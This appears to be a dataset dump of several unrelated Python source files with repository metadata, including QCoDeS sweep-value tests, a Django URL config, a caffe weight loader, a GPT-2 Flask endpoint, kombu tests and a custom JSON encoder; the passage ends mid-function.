816e76809160e9af457f6ef6d4aca1b0dd5eea82
|
[
"MIT"
] | 223
|
2016-10-29T15:00:24.000Z
|
2022-03-20T06:53:34.000Z
|
qcodes/tests/test_sweep_values.py
|
M1racleShih/Qcodes
|
c03029a6968e16379155aadc8b083a02e01876a6
|
[
"MIT"
] | 3,406
|
2016-10-25T10:44:50.000Z
|
2022-03-31T09:47:35.000Z
|
qcodes/tests/test_sweep_values.py
|
nikhartman/Qcodes
|
042c5e25ab9e40b20c316b4055c4842844834d1e
|
[
"MIT"
] | 263
|
2016-10-25T11:35:36.000Z
|
2022-03-31T08:53:20.000Z
|
import pytest
from qcodes.instrument.parameter import Parameter
from qcodes.instrument.sweep_values import SweepValues
from qcodes.utils.validators import Numbers
@pytest.fixture(name='c0')
def _make_c0():
c0 = Parameter('c0', vals=Numbers(-10, 10), get_cmd=None, set_cmd=None)
yield c0
@pytest.fixture(name='c1')
def _make_c1():
c1 = Parameter('c1', get_cmd=None, set_cmd=None)
yield c1
@pytest.fixture(name='c2')
def _make_c2():
c2 = Parameter('c2', get_cmd=lambda: 42)
yield c2
def test_errors(c0, c1, c2):
# only complete 3-part slices are valid
with pytest.raises(TypeError):
c0[1:2] # For Int params this could be defined as step=1
with pytest.raises(TypeError):
c0[:2:3]
with pytest.raises(TypeError):
c0[1::3]
with pytest.raises(TypeError):
c0[:] # For Enum params we *could* define this one too...
# fails if the parameter has no setter
with pytest.raises(TypeError):
c2[0:0.1:0.01]
# validates every step value against the parameter's Validator
with pytest.raises(ValueError):
c0[5:15:1]
with pytest.raises(ValueError):
c0[5.0:15.0:1.0]
with pytest.raises(ValueError):
c0[-12]
with pytest.raises(ValueError):
c0[-5, 12, 5]
with pytest.raises(ValueError):
c0[-5, 12:8:1, 5]
# cannot combine SweepValues for different parameters
with pytest.raises(TypeError):
c0[0.1] + c1[0.2]
# improper use of extend
with pytest.raises(TypeError):
c0[0.1].extend(5)
# SweepValue object has no getter, even if the parameter does
with pytest.raises(AttributeError):
c0[0.1].get
def test_valid(c0):
c0_sv = c0[1]
# setter gets mapped
assert c0_sv.set == c0.set
# normal sequence operations access values
assert list(c0_sv) == [1]
assert c0_sv[0] == 1
assert 1 in c0_sv
assert not (2 in c0_sv)
# in-place and copying addition
c0_sv += c0[1.5:1.8:0.1]
c0_sv2 = c0_sv + c0[2]
assert list(c0_sv) == [1, 1.5, 1.6, 1.7]
assert list(c0_sv2) == [1, 1.5, 1.6, 1.7, 2]
# append and extend
c0_sv3 = c0[2]
# append only works with straight values
c0_sv3.append(2.1)
# extend can use another SweepValue, (even if it only has one value)
c0_sv3.extend(c0[2.2])
# extend can also take a sequence
c0_sv3.extend([2.3])
# as can addition
c0_sv3 += [2.4]
c0_sv4 = c0_sv3 + [2.5, 2.6]
assert list(c0_sv3) == [2, 2.1, 2.2, 2.3, 2.4]
assert list(c0_sv4) == [2, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6]
# len
assert len(c0_sv3) == 5
# in-place and copying reverse
c0_sv.reverse()
c0_sv5 = reversed(c0_sv)
assert list(c0_sv) == [1.7, 1.6, 1.5, 1]
assert list(c0_sv5) == [1, 1.5, 1.6, 1.7]
# multi-key init, where first key is itself a list
c0_sv6 = c0[[1, 3], 4]
# copying
c0_sv7 = c0_sv6.copy()
assert list(c0_sv6) == [1, 3, 4]
assert list(c0_sv7) == [1, 3, 4]
assert not (c0_sv6 is c0_sv7)
def test_base():
p = Parameter('p', get_cmd=None, set_cmd=None)
with pytest.raises(NotImplementedError):
iter(SweepValues(p))
def test_snapshot(c0):
assert c0[0].snapshot() == {
'parameter': c0.snapshot(),
'values': [{'item': 0}]
}
assert c0[0:5:0.3].snapshot()['values'] == [{
'first': 0,
'last': 4.8,
'num': 17,
'type': 'linear'
}]
sv = c0.sweep(start=2, stop=4, num=5)
assert sv.snapshot()['values'] == [{
'first': 2,
'last': 4,
'num': 5,
'type': 'linear'
}]
# mixture of bare items, nested lists, and slices
sv = c0[1, 7, 3.2, [1, 2, 3], 6:9:1, -4.5, 5.3]
assert sv.snapshot()['values'] == [{
'first': 1,
'last': 5.3,
'min': -4.5,
'max': 8,
'num': 11,
'type': 'sequence'
}]
assert (c0[0] + c0[1]).snapshot()['values'] == [
{'item': 0},
{'item': 1}
]
assert (c0[0:3:1] + c0[4, 6, 9]).snapshot()['values'] == [
{'first': 0, 'last': 2, 'num': 3, 'type': 'linear'},
{'first': 4, 'last': 9, 'min': 4, 'max': 9, 'num': 3,
'type': 'sequence'}
]
def test_repr(c0):
sv = c0[0]
assert repr(sv) == (
f'<qcodes.instrument.sweep_values.SweepFixedValues: c0 at {id(sv)}>'
)
| 25.235632
| 76
| 0.566614
| 0
| 0
| 258
| 0.058757
| 339
| 0.077203
| 0
| 0
| 1,145
| 0.260761
|
b2920a5b35fa8d9589396ec223bdc4d33e30fd7a
| 350
|
py
|
Python
|
src/django_powerdns_api/urls.py
|
andrzej-jankowski/django-powerdns-api
|
c7bc793022ba9fde2dd0e3564c3c63398611540b
|
[
"Apache-2.0"
] | null | null | null |
src/django_powerdns_api/urls.py
|
andrzej-jankowski/django-powerdns-api
|
c7bc793022ba9fde2dd0e3564c3c63398611540b
|
[
"Apache-2.0"
] | null | null | null |
src/django_powerdns_api/urls.py
|
andrzej-jankowski/django-powerdns-api
|
c7bc793022ba9fde2dd0e3564c3c63398611540b
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from django.conf.urls import patterns, include, url
from django_powerdns_api.routers import router
urlpatterns = patterns(
'',
url(r'^', include(router.urls)),
)
| 20.588235
| 51
| 0.768571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.088571
|
b292be09587a07ede608a3607cc6852e3db17188
| 925
|
py
|
Python
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
|
Passer-D/GameAISDK
|
a089330a30b7bfe1f6442258a12d8c0086240606
|
[
"Apache-2.0"
] | 1,210
|
2020-08-18T07:57:36.000Z
|
2022-03-31T15:06:05.000Z
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
|
guokaiSama/GameAISDK
|
a089330a30b7bfe1f6442258a12d8c0086240606
|
[
"Apache-2.0"
] | 37
|
2020-08-24T02:48:38.000Z
|
2022-01-30T06:41:52.000Z
|
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/mobileDevice/android/plugin/Platform_plugin/PlatformWeTest/__init__.py
|
guokaiSama/GameAISDK
|
a089330a30b7bfe1f6442258a12d8c0086240606
|
[
"Apache-2.0"
] | 275
|
2020-08-18T08:35:16.000Z
|
2022-03-31T15:06:07.000Z
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import platform
__is_windows_system = platform.platform().lower().startswith('window')
__is_linux_system = platform.platform().lower().startswith('linux')
if __is_windows_system:
from .demo_windows.PlatformWeTest import PlatformWeTest
from .demo_windows.common.AdbTool import AdbTool
elif __is_linux_system:
from .demo_ubuntu16.PlatformWeTest import PlatformWeTest
from .demo_ubuntu16.common.AdbTool import AdbTool
else:
raise Exception('system is not support!')
def GetInstance():
return PlatformWeTest()
| 35.576923
| 111
| 0.776216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 429
| 0.463784
|
b293b0671b5147e6e833e70a808c61e5033f825f
| 579
|
py
|
Python
|
python/codingbat/src/sum_double.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
python/codingbat/src/sum_double.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | 2
|
2022-03-10T03:49:14.000Z
|
2022-03-14T00:49:54.000Z
|
python/codingbat/src/sum_double.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""sum_double
Given two int values, return their sum.
Unless the two values are the same, then return double their sum.
sum_double(1, 2) → 3
sum_double(3, 2) → 5
sum_double(2, 2) → 8
source: https://codingbat.com/prob/p141905
"""
def sum_double(a: int, b: int) -> int:
"""Sum Double.
Return the sum or if a == b return double the sum.
"""
multiply = 1
if a == b:
multiply += 1
return (a + b) * multiply
if __name__ == "__main__":
print(sum_double(1, 2))
print(sum_double(3, 2))
print(sum_double(2, 2))
| 18.09375
| 65
| 0.618307
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 349
| 0.596581
|
b293c4e951eab343a95232f50c197cd3ae253ad6
| 126
|
py
|
Python
|
database_email_backend/__init__.py
|
enderlabs/django-database-email-backend
|
aad6bade66d076b5425f772430adc7e77e60f5ce
|
[
"MIT"
] | 1
|
2016-01-15T18:54:59.000Z
|
2016-01-15T18:54:59.000Z
|
database_email_backend/__init__.py
|
enderlabs/django-database-email-backend
|
aad6bade66d076b5425f772430adc7e77e60f5ce
|
[
"MIT"
] | 1
|
2015-11-04T22:19:21.000Z
|
2015-11-04T22:19:21.000Z
|
database_email_backend/__init__.py
|
enderlabs/django-database-email-backend
|
aad6bade66d076b5425f772430adc7e77e60f5ce
|
[
"MIT"
] | 4
|
2015-11-04T20:45:16.000Z
|
2021-03-03T06:28:20.000Z
|
# -*- coding: utf-8 -*-
VERSION = (1, 0, 4)
__version__ = "1.0.4"
__authors__ = ["Stefan Foulis <stefan.foulis@gmail.com>", ]
| 25.2
| 59
| 0.611111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 71
| 0.563492
|
b293f0ceac4f743a52151b0799d4e433f9e36af9
| 366
|
py
|
Python
|
src/draw.py
|
mattdesl/inkyphat-mods
|
2867161e66ffce87b75170e081f5ab481ce5e6b1
|
[
"MIT"
] | 7
|
2020-04-25T09:24:18.000Z
|
2022-01-02T03:24:24.000Z
|
src/draw.py
|
mattdesl/inkyphat-mods
|
2867161e66ffce87b75170e081f5ab481ce5e6b1
|
[
"MIT"
] | null | null | null |
src/draw.py
|
mattdesl/inkyphat-mods
|
2867161e66ffce87b75170e081f5ab481ce5e6b1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import argparse
from PIL import Image
from inky import InkyPHAT
print("""Inky pHAT/wHAT: Logo
Displays the Inky pHAT/wHAT logo.
""")
type = "phat"
colour = "black"
inky_display = InkyPHAT(colour)
inky_display.set_border(inky_display.BLACK)
img = Image.open("assets/InkypHAT-212x104-bw.png")
inky_display.set_image(img)
inky_display.show()
| 18.3
| 50
| 0.762295
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 127
| 0.346995
|
b296a32574784e1bd7a3f60cbb896711ff7dd880
| 1,230
|
py
|
Python
|
newsapp/tests.py
|
Esther-Anyona/four-one-one
|
6a5e019b35710941a669c1b49e993b683c99d615
|
[
"MIT"
] | null | null | null |
newsapp/tests.py
|
Esther-Anyona/four-one-one
|
6a5e019b35710941a669c1b49e993b683c99d615
|
[
"MIT"
] | null | null | null |
newsapp/tests.py
|
Esther-Anyona/four-one-one
|
6a5e019b35710941a669c1b49e993b683c99d615
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from .models import *
from django.contrib.auth.models import User
# Create your tests here.
user = User.objects.get(id=1)
profile = Profile.objects.get(id=1)
neighbourhood = Neighbourhood.objects.get(id=1)
class TestBusiness(TestCase):
def setUp(self):
self.business=Business(name = "hardware", description="your stop for best prices", user= profile, neighbourhood_id=neighbourhood, business_email='mail@gmail.com')
self.business.save()
def test_instance(self):
self.assertTrue(isinstance(self.business,Business))
def test_create_business(self):
self.business.create_business()
businesses=Business.objects.all()
self.assertTrue(len(businesses)>0)
def test_delete_business(self):
self.business.delete_business()
businesses=Business.objects.all()
self.assertTrue(len(businesses)==0)
def test_update_business(self):
self.business.create_business()
# self.business.update_business(self.business.id, 'hardware')
updated_business = Business.objects.all()
self.assertTrue(len(updated_business) > 0)
def tearDown(self):
Business.objects.all().delete()
| 30
| 170
| 0.702439
| 978
| 0.795122
| 0
| 0
| 0
| 0
| 0
| 0
| 139
| 0.113008
|
b296bd14330ba64af65527855f690dd49d0a2709
| 4,620
|
py
|
Python
|
ssdlite/load_caffe_weights.py
|
kkrpawkal/MobileNetv2-SSDLite
|
b434ed07b46d6e7f733ec97e180b57c8db30cae3
|
[
"MIT"
] | null | null | null |
ssdlite/load_caffe_weights.py
|
kkrpawkal/MobileNetv2-SSDLite
|
b434ed07b46d6e7f733ec97e180b57c8db30cae3
|
[
"MIT"
] | null | null | null |
ssdlite/load_caffe_weights.py
|
kkrpawkal/MobileNetv2-SSDLite
|
b434ed07b46d6e7f733ec97e180b57c8db30cae3
|
[
"MIT"
] | null | null | null |
import numpy as np
import sys,os
caffe_root = '/home/yaochuanqi/work/ssd/caffe/'
sys.path.insert(0, caffe_root + 'python')
import caffe
deploy_proto = 'deploy.prototxt'
save_model = 'deploy.caffemodel'
weights_dir = 'output'
box_layers = ['conv_13/expand', 'Conv_1', 'layer_19_2_2', 'layer_19_2_3', 'layer_19_2_4', 'layer_19_2_5']
def load_weights(path, shape=None):
weights = None
if shape is None:
weights = np.fromfile(path, dtype=np.float32)
else:
weights = np.fromfile(path, dtype=np.float32).reshape(shape)
os.unlink(path)
return weights
def load_data(net):
for key in net.params.iterkeys():
if type(net.params[key]) is caffe._caffe.BlobVec:
print(key)
if 'mbox' not in key and (key.startswith("conv") or key.startswith("Conv") or key.startswith("layer")):
print('conv')
if key.endswith("/bn"):
prefix = weights_dir + '/' + key.replace('/', '_')
net.params[key][0].data[...] = load_weights(prefix + '_moving_mean.dat')
net.params[key][1].data[...] = load_weights(prefix + '_moving_variance.dat')
net.params[key][2].data[...] = np.ones(net.params[key][2].data.shape, dtype=np.float32)
elif key.endswith("/scale"):
prefix = weights_dir + '/' + key.replace('scale','bn').replace('/', '_')
net.params[key][0].data[...] = load_weights(prefix + '_gamma.dat')
net.params[key][1].data[...] = load_weights(prefix + '_beta.dat')
else:
prefix = weights_dir + '/' + key.replace('/', '_')
ws = np.ones((net.params[key][0].data.shape[0], 1, 1, 1), dtype=np.float32)
if os.path.exists(prefix + '_weights_scale.dat'):
ws = load_weights(prefix + '_weights_scale.dat', ws.shape)
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape) * ws
if len(net.params[key]) > 1:
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
elif 'mbox_loc/depthwise' in key or 'mbox_conf/depthwise' in key:
prefix = key[0:key.find('_mbox')]
index = box_layers.index(prefix)
if 'mbox_loc' in key:
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_BoxEncodingPredictor_depthwise'
else:
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_ClassPredictor_depthwise'
if key.endswith("/bn"):
net.params[key][0].data[...] = load_weights(prefix + '_bn_moving_mean.dat')
net.params[key][1].data[...] = load_weights(prefix + '_bn_moving_variance.dat')
net.params[key][2].data[...] = np.ones(net.params[key][2].data.shape, dtype=np.float32)
elif key.endswith("/scale"):
net.params[key][0].data[...] = load_weights(prefix + '_gamma.dat')
net.params[key][1].data[...] = load_weights(prefix + '_beta.dat')
else:
print key
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape)
if len(net.params[key]) > 1:
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
elif key.endswith("mbox_loc"):
prefix = key.replace("_mbox_loc", "")
index = box_layers.index(prefix)
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_BoxEncodingPredictor'
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape)
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
elif key.endswith("mbox_conf"):
prefix = key.replace("_mbox_conf", "")
index = box_layers.index(prefix)
prefix = weights_dir + '/BoxPredictor_' + str(index) + '_ClassPredictor'
net.params[key][0].data[...] = load_weights(prefix + '_weights.dat', net.params[key][0].data.shape)
net.params[key][1].data[...] = load_weights(prefix + '_biases.dat')
else:
print ("error key " + key)
net_deploy = caffe.Net(deploy_proto, caffe.TEST)
load_data(net_deploy)
net_deploy.save(save_model)
| 54.352941
| 124
| 0.541775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 823
| 0.178139
|
b2977674be0d43e625cea5afb3180e9f200426a4
| 996
|
py
|
Python
|
qa327/frontend/exceptions.py
|
rickyzhangca/CISC-327
|
e419caafa6ae3fe77aa411228b6b58b237fe6a61
|
[
"MIT"
] | null | null | null |
qa327/frontend/exceptions.py
|
rickyzhangca/CISC-327
|
e419caafa6ae3fe77aa411228b6b58b237fe6a61
|
[
"MIT"
] | 39
|
2020-10-11T02:31:14.000Z
|
2020-12-15T20:18:56.000Z
|
qa327/frontend/exceptions.py
|
rickyzhangca/CISC-327
|
e419caafa6ae3fe77aa411228b6b58b237fe6a61
|
[
"MIT"
] | 1
|
2020-10-17T02:44:43.000Z
|
2020-10-17T02:44:43.000Z
|
'''
This is the exceptions module:
'''
'''
Exception of when user do not have the access to certain pages.
'''
class CannotAccessPageException(Exception):
pass
'''
Exception of the first password and the second password does not match during registration.
'''
class PasswordsNotMatchingException(Exception):
pass
'''
Exception of when the user input format is wrong.
'''
class WrongFormatException(Exception):
def __init__(self, message=''):
super().__init__('{}, format is incorrect.'.format(message))
'''
Exception of when the ticket name is wrong.
'''
class WrongTicketNameException(Exception):
pass
'''
Exception of when the ticket quantity is wrong.
'''
class WrongTicketQuantityException(Exception):
pass
'''
Exception of when the ticket quantity is wrong.
'''
class WrongTicketPriceException(Exception):
pass
'''
Exception of when the email already exists in user data (already registered).
'''
class EmailAlreadyExistsException(Exception):
pass
| 21.191489
| 91
| 0.736948
| 463
| 0.464859
| 0
| 0
| 0
| 0
| 0
| 0
| 539
| 0.541165
|
b299f61f9bab8f0fdfd0cbba6dbcac61cd8b37ce
| 239
|
py
|
Python
|
dags/minimal_dag.py
|
MarcusJones/kaggle_petfinder_adoption
|
2d745b48405f4d4211b523eae272b9169fcf9fa2
|
[
"MIT"
] | 1
|
2019-01-24T04:22:39.000Z
|
2019-01-24T04:22:39.000Z
|
dags/minimal_dag.py
|
MarcusJones/kaggle_petfinder_adoption
|
2d745b48405f4d4211b523eae272b9169fcf9fa2
|
[
"MIT"
] | null | null | null |
dags/minimal_dag.py
|
MarcusJones/kaggle_petfinder_adoption
|
2d745b48405f4d4211b523eae272b9169fcf9fa2
|
[
"MIT"
] | null | null | null |
import airflow as af
from airflow.operators.dummy_operator import DummyOperator
from datetime import datetime
with af.DAG('minimal_dag', start_date=datetime(2016, 1, 1)) as dag:
op = DummyOperator(task_id='op')
op.dag is dag # True
| 23.9
| 67
| 0.76569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.096234
|
b29ab73d546b03f1d056e040fdce2adc50067aef
| 2,567
|
py
|
Python
|
app.py
|
paulinaacostac/GPT2
|
4d06584b2e8adfa708f1306e38dadd48c899ac8a
|
[
"MIT"
] | 2
|
2022-01-06T17:48:58.000Z
|
2022-01-06T18:23:31.000Z
|
app.py
|
paulinaacostac/gpt2-WebAPI
|
4d06584b2e8adfa708f1306e38dadd48c899ac8a
|
[
"MIT"
] | null | null | null |
app.py
|
paulinaacostac/gpt2-WebAPI
|
4d06584b2e8adfa708f1306e38dadd48c899ac8a
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
import os
import numpy as np
import tensorflow.compat.v1 as tf
from src import model, sample, encoder
from flask import Flask
from flask import request, jsonify
import time
######model
def interact_model(
model_name='run1',
seed=None,
nsamples=1,
batch_size=1,
length=None,
temperature=1,
top_k=0,
top_p=1,
models_dir='checkpoint',
):
models_dir = os.path.expanduser(os.path.expandvars(models_dir))
if batch_size is None:
batch_size = 1
assert nsamples % batch_size == 0
enc = encoder.get_encoder(model_name, models_dir)
hparams = model.default_hparams()
with open(os.path.join(models_dir, model_name, 'hparams.json')) as f:
hparams.override_from_dict(json.load(f))
if length is None:
length = hparams.n_ctx // 2
elif length > hparams.n_ctx:
raise ValueError("Can't get samples longer than window size: %s" % hparams.n_ctx)
with tf.Session(graph=tf.Graph()) as sess:
context = tf.placeholder(tf.int32, [batch_size, None])
np.random.seed(seed)
tf.set_random_seed(seed)
output = sample.sample_sequence(
hparams=hparams, length=length,
context=context,
batch_size=batch_size,
temperature=temperature, top_k=top_k, top_p=top_p
)
saver = tf.train.Saver()
ckpt = tf.train.latest_checkpoint(os.path.join(models_dir, "run1"))
saver.restore(sess, ckpt)
yield sess, context, output, enc
def output_something(bio, sess, context, output, enc):
raw_text = bio#input("Model prompt >>> ")
context_tokens = enc.encode(raw_text)
generated = 0
out = sess.run(output, feed_dict={
context: [context_tokens for _ in range(1)]
})[:, len(context_tokens):] #Get samples
text = enc.decode(out[0]) #decodes samples
print(text)
return text
########API
gen = interact_model()
sess, context, output, enc = next(gen)
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def welcome():
start_time = time.time()
bio = request.args.get('bio')
res = output_something(bio, sess, context, output, enc)
sentences = res.split("\n")[:3]
print("----------------------------------------------------------- %s seconds ----------------------------------------------" % (time.time() - start_time))
return jsonify(sentences=sentences)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=105)
| 26.463918
| 159
| 0.603039
| 0
| 0
| 1,324
| 0.515777
| 420
| 0.163615
| 0
| 0
| 346
| 0.134788
|
b29b61190657129eadf2448fe993cb4e944db000
| 1,096
|
py
|
Python
|
t/unit/utils/test_div.py
|
kaiix/kombu
|
580b5219cc50cad278c4b664d0e0f85e37a5e9ea
|
[
"BSD-3-Clause"
] | 1,920
|
2015-01-03T15:43:23.000Z
|
2022-03-30T19:30:35.000Z
|
t/unit/utils/test_div.py
|
kaiix/kombu
|
580b5219cc50cad278c4b664d0e0f85e37a5e9ea
|
[
"BSD-3-Clause"
] | 949
|
2015-01-02T18:56:00.000Z
|
2022-03-31T23:14:59.000Z
|
t/unit/utils/test_div.py
|
kaiix/kombu
|
580b5219cc50cad278c4b664d0e0f85e37a5e9ea
|
[
"BSD-3-Clause"
] | 833
|
2015-01-07T23:56:35.000Z
|
2022-03-31T22:04:11.000Z
|
import pickle
from io import BytesIO, StringIO
from kombu.utils.div import emergency_dump_state
class MyStringIO(StringIO):
def close(self):
pass
class MyBytesIO(BytesIO):
def close(self):
pass
class test_emergency_dump_state:
def test_dump(self, stdouts):
fh = MyBytesIO()
stderr = StringIO()
emergency_dump_state(
{'foo': 'bar'}, open_file=lambda n, m: fh, stderr=stderr)
assert pickle.loads(fh.getvalue()) == {'foo': 'bar'}
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
def test_dump_second_strategy(self, stdouts):
fh = MyStringIO()
stderr = StringIO()
def raise_something(*args, **kwargs):
raise KeyError('foo')
emergency_dump_state(
{'foo': 'bar'},
open_file=lambda n, m: fh,
dump=raise_something,
stderr=stderr,
)
assert 'foo' in fh.getvalue()
assert 'bar' in fh.getvalue()
assert stderr.getvalue()
assert not stdouts.stdout.getvalue()
| 23.319149
| 69
| 0.595803
| 990
| 0.903285
| 0
| 0
| 0
| 0
| 0
| 0
| 45
| 0.041058
|
b29c8d36ba3db7e707e861825377dec464aebc9b
| 3,754
|
py
|
Python
|
intents/oversights/more_than_just_topk.py
|
googleinterns/debaised-analysis
|
0dad1186a177a171956a33c49999d9387b9f989d
|
[
"Apache-2.0"
] | 1
|
2020-06-26T19:16:15.000Z
|
2020-06-26T19:16:15.000Z
|
intents/oversights/more_than_just_topk.py
|
bhagyakjain/debaised-analysis
|
6b8b27575bf3f60a6711e370bfad838e29f5cc8a
|
[
"Apache-2.0"
] | 30
|
2020-06-01T13:42:25.000Z
|
2022-03-31T03:58:55.000Z
|
intents/oversights/more_than_just_topk.py
|
googleinterns/debaised-analysis
|
0dad1186a177a171956a33c49999d9387b9f989d
|
[
"Apache-2.0"
] | 10
|
2020-06-10T05:43:59.000Z
|
2020-08-20T10:32:24.000Z
|
"""
Copyright 2020 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
"""This module implements detection of the more than just topk oversight
in the top-k intent.
More_than_just_topk is the oversight which arises when the user misses
rows after the kth row that have metric equal-to or close-by the kth row.
Here we use the difference with the kth row normalized by the standard
deviation of top-k to decide if any row is similar to the
"""
from util import constants, enums
def more_than_just_topk(result_table, k, metric):
"""This function gives suggestions if 'more than just top-k' oversight is
detected in the results generated by the top-k.
This function gives suggestions to increasse k if some of the rows after
the kth row are very similar to the kth row.
Parameter used to decide if a row is similar to the kth row.
absolute value of (row - kth_row) / std_dev
standard deviation is calculated for the top-k rows only
std_dev -> standard deviation of metric of the top-k rows
row, kth_row -> value of metric of the considered row
The cut-off is fixed in the util/constants module
Args:
topk_results: Type-pandas dataframe
contain the results without cropping rows not in top-k.
k: integer
It is the number of entries to be taken in the top-k results.
metric: str
It is the column name of the metric column
Returns:
suggestion : dictonary with keys 'suggestion', 'oversight_name',
'change_list', 'confidence_score'.
change_list is an efficient way of encoding the new suggested query
json that we suggest the user to try.
"""
num_rows = result_table.shape[0]
# No suggestion if all rows already in the result
if k >= num_rows or k == -1:
return
# standard deviation of top k rows
standard_deviation_topk = None
if k == 1:
standard_deviation_topk = 0
else:
standard_deviation_topk = result_table[:k][metric].std()
# lower bound & upper bound for the value of metric
val_lower_bound = result_table[metric][k - 1] - standard_deviation_topk * constants.MORE_THAN_JUST_TOPK_THRESHOLD
val_upper_bound = result_table[metric][k - 1] + standard_deviation_topk * constants.MORE_THAN_JUST_TOPK_THRESHOLD
# init the k in suggested query as k in original query
new_k = k
confidence_score = 0
for row in range(k, num_rows):
# value of metric at row
val = result_table[metric][row]
if val_lower_bound <= val and val <= val_upper_bound:
new_k = row + 1
else:
break
if standard_deviation_topk == 0:
return
confidence_score = abs(result_table[metric][new_k - 1] - result_table[metric][k - 1]) / standard_deviation_topk
if new_k != k:
change_list = {'topKLimit':new_k}
suggestion = {}
suggestion['change_list'] = change_list
suggestion['suggestion'] = 'value of ' + metric + ' in some rows after the top-k is similar to the Kth row'
suggestion['confidence_score'] = confidence_score
suggestion['oversight'] = enums.Oversights.MORE_THAN_JUST_TOPK
return suggestion
else:
return
| 37.168317
| 117
| 0.697389
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,441
| 0.65024
|
b29d27c7cb2d0e54f4f91d86ff0c6d726cd311a6
| 733
|
py
|
Python
|
release/stubs.min/System/Net/__init___parts/TransportContext.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 182
|
2017-06-27T02:26:15.000Z
|
2022-03-30T18:53:43.000Z
|
release/stubs.min/System/Net/__init___parts/TransportContext.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 28
|
2017-06-27T13:38:23.000Z
|
2022-03-15T11:19:44.000Z
|
release/stubs.min/System/Net/__init___parts/TransportContext.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 67
|
2017-06-28T09:43:59.000Z
|
2022-03-20T21:17:10.000Z
|
class TransportContext(object):
""" The System.Net.TransportContext class provides additional context about the underlying transport layer. """
def GetChannelBinding(self,kind):
"""
GetChannelBinding(self: TransportContext,kind: ChannelBindingKind) -> ChannelBinding
Retrieves the requested channel binding.
kind: The type of channel binding to retrieve.
Returns: The requested System.Security.Authentication.ExtendedProtection.ChannelBinding,or null if the
channel binding is not supported by the current transport or by the operating system.
"""
pass
def GetTlsTokenBindings(self):
""" GetTlsTokenBindings(self: TransportContext) -> IEnumerable[TokenBinding] """
pass
| 31.869565
| 113
| 0.746248
| 731
| 0.997271
| 0
| 0
| 0
| 0
| 0
| 0
| 604
| 0.824011
|
b29e142efe612167f93b68a27b4c24715a4da2ff
| 1,058
|
py
|
Python
|
zkpytb/json.py
|
zertrin/zkpytb
|
066662d9c7bd233f977302cb11cf888a2a1828d2
|
[
"MIT"
] | 2
|
2021-07-17T19:30:17.000Z
|
2022-02-14T04:55:46.000Z
|
zkpytb/json.py
|
zertrin/zkpytb
|
066662d9c7bd233f977302cb11cf888a2a1828d2
|
[
"MIT"
] | null | null | null |
zkpytb/json.py
|
zertrin/zkpytb
|
066662d9c7bd233f977302cb11cf888a2a1828d2
|
[
"MIT"
] | null | null | null |
"""
Helper functions related to json
Author: Marc Gallet
"""
import datetime
import decimal
import json
import uuid
import pathlib
class JSONEncoder(json.JSONEncoder):
"""
A custom JSONEncoder that can handle a bit more data types than the one from stdlib.
"""
def default(self, o):
# early passthrough if it works by default
try:
return json.JSONEncoder.default(self, o)
except Exception:
pass
# handle Path objects
if isinstance(o, pathlib.Path):
return str(o).replace('\\', '/')
# handle UUID objects
if isinstance(o, uuid.UUID):
return str(o)
if isinstance(o, (datetime.datetime, datetime.time, datetime.date)):
return o.isoformat()
if isinstance(o, datetime.timedelta):
return o.total_seconds()
if isinstance(o, (complex, decimal.Decimal)):
return str(o)
# Let the base class default method raise the TypeError
